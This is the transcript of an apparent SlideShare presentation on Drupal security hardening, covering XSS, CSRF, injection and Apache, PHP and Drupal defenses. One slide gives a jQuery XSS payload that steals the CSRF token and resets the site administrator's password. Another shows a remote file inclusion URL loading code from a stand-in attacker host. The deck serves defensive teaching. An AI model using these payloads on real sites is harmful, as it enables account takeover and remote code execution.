Drupal Security Hardening
Upcoming SlideShare
Loading in...5

Drupal Security Hardening



All about web security and vulnerabilities and how to counter measure these threats.

All about web security and vulnerabilities and how to counter measure these threats.



Total Views
Views on SlideShare
Embed Views



2 Embeds 2

http://www.docshut.com 1
http://www.slashdocs.com 1



Upload Details

Uploaded via as OpenOffice

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Drupal Security Hardening Drupal Security Hardening Presentation Transcript

  • Agenda● Anatomy of Vulnerabilities● Protecting against Vulnerabilities
  • Kite Systems is an Agile development house which means the client is actively involved all the way through the development process. We build high quality, secure platforms using Java J2EE, Microsoft .NET, Ruby on Rails, PHP and Python.
  • Join Us
  • About myself, Gerald Villorente● Web Developer/themer at Kite Systems Inc.● Drupal developer since 2010● Drupal PH kids mentor
  • Is Drupal Secure?
  • State of being “SECURE” A site is secure if:● private data is kept private,● the site cannot be forced offline or into a degraded mode by a remote visitor● the site resources are used only for their intended purposes● the site content can be edited only by appropriate users.”
  • Week spot of web applications For Drupal developer who wants to deliver an applications, security do not ends with proper use of Drupal security API:● OS (MS, Unix, BSD, OS X)● Web Server (Apache, IIS, Nginx, ...)● Web Platform (php, .NET, ...)● Other Services (ftp, …)● Web applications - attacks against authentication & authorization, site structure, input validation, app logic● database - sql injection● availability - DoS attacks
  • Common Drupal attacks● XSS● CSRF● Injection
  • XSS jQuery.get(Drupal.settings.basePath + user/1/edit, function (data, status) { if (status == success) { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": user_profile_form, "form_token": token, "pass[pass1]": hacked, "pass[pass2]": hacked }; jQuery.post(Drupal.settings.basePath + user/1/edit, payload); } } ); }
  • Other Attacks● DDoS● Remote code execution - Exploiting register_globals in PHP require ($page . ".php"); http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
  • Demo
  • Counter Measures● Proper use of Drupal API● Coding Standard (coder, code_sniffer) - Coder & Sniffer demo● Keep up with security patches and minor releases● Permission by role (hook_perm, user_access)● Firewall● SSL (Secure Socket Layer)
  • Counter Measures (cont.)● File permission
  • Apache Hardening● Disable unneeded modules● Implement ModSecurity, Request Filtering, Anti-Evasion Techniques, HTTP Filtering Rules, Full Audit Logging, HTTPS Intercepting, Chroot Functionality, Mask Web Server Identity● Document root restriction – allow Apache to only go to /path/to/public_html
  • Apache Hardening● Chrooting Apache $ mkdir -p /var/chroot/apache $ adduser --home /var/chroot/apache --shell /bin/false --no-create-home --system --group juandelacruz
  • PHP Hardening (part 1)● turn off register_globals● open_basedir - restrict php file access to only certain directories● disable_functions● expose_php - remove php info from http headers● display_errors● safe_mode - php can use only files which it is an owner● allow_url_fopen
  • PHP Hardening (part 2)● Suhoshin - php engine protection with couple of patches - range of runtime protection, session protection, filtering features and logging - features
  • Drupal Hardening● Keep updated● Coding standard● Install only trusted module, check issue queue● Use captcha, login_security, single_login, password_policy, salt● user permission● input formats and filter
  • Drupal Hardening: Coding Standard Never write and/or execute sql commands manually, use Drupal DB layer use db_query() properly dont write db_query("SELECT * FROM {users} WHERE name = $username") ; write this db_query("SELECT * FROM {users} WHERE name = %s", $username); placeholders are: %s, %d, %f, %b, %% use db_rewrite_sql to respect node access restrictions $result = db_query(db_rewrite_sql("SELECT n.nid, n.title FROM {node} n"));
  • Drupal Hardening: Form API● never write forms that manually uses Drupals Forms API● Forms API protects you from invalid form data● Forms API protects you against CSRF● dont trust js for input validation - its easy to disable it. If you want to use it always check user data on server side.● when using AJAX use drupal_get_token and drupal_check_token:● Calculate hash of defined string, user session and site specific secret code
  • Drupal Hardening: File Upload● file_validate_is_image - check if file is really an image● check_file - check if file is uploaded via HTTP POST● file_check_location - Check if a file is really located inside $directory● set disk quotes properly - you dont want to fill server hard disk
  • Drupal Hardening: Respect and definenew permissions● consider to use hook_perm in your module● wrap your code with user_access if (user_access(some permission)) { .... }● filter_access($format) – check if user has access to requested filter format● use menu access arguments
  • Drupal Hardening: Dont trust user input Filter user input, sanitize the output● Input Format● filter_xss() - Filters HTML to prevent XSS● check_plain() - Encodes special characters in a plain-text string for display as HTML● check_url() - filter dangerous protocol● check_markup - Run all the enabled filters on a piece of text
  • Drupal Hardening: Dont trust user input
  • Again, think like a hacker...● Use penetration testing tool - Metasploit framework - Nessus - Nikto - Backbox and Backtrack● Fix, audit, fix ...
  • Resources● http://drupal.org/security● http://drupal.org/writing-secure-code● http://crackingdrupal.com● http://www.owasp.org● http://ha.ckers.org● http://www.exploit-db.com